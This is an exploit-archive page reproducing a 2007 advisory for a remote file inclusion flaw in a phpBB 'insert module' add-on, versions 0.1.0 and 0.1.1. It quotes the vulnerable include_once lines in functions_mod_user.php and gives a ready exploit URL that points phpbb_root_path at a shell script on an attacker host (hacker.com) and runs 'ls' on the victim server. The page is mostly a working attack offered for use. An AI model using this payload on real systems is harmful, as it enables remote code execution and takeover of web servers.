Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2007030029

Below is a copy:

$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code :

<-- code start -->

include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);

$ Exploit :

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hack
er.com/shell.txt?&cmd=ls

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.